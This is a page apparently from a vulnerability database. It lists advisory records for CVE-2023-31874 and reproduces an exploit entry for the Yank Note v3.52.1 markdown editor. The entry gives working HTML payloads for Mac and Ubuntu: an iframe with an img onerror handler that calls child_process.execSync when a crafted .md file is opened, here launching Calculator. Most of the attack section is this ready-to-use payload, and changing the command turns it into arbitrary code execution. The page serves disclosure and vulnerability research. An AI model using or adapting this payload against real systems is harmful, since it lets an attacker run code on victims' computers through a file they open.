| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Vulnerability | 23 May 202300:00 | – | zdt | |
| CVE-2023-31874 | 29 May 202300:15 | – | attackerkb | |
| Yank Note 安全漏洞 | 23 May 202300:00 | – | cnnvd | |
| CVE-2023-31874 | 28 May 202300:00 | – | cve | |
| CVE-2023-31874 | 28 May 202300:00 | – | cvelist | |
| Yank Note v3.52.1 (Electron) - Arbitrary Code Execution | 23 May 202300:00 | – | exploitdb | |
| EUVD-2023-36164 | 3 Oct 202520:07 | – | euvd | |
| CVE-2023-31874 | 29 May 202300:15 | – | nvd | |
| Code injection | 29 May 202300:15 | – | prion | |
| PT-2023-23501 · Yank Note · Yank Note | 28 May 202300:00 | – | ptsecurity |
`# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]
Release Date: 2023-04-27
Product & Service Introduction: A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement
Technical Details & Description:
A vulnerability was discovered on Yank Note v3.52.1 allowing a user to execute arbitrary code by opening a specially crafted file.
Proof of Concept (PoC):
Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload.
Mac:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">
Ubuntu:
<iframe srcdoc"<img srcx onerroralert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">
Opening the file in Yank Note will auto execute the Calculator application.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation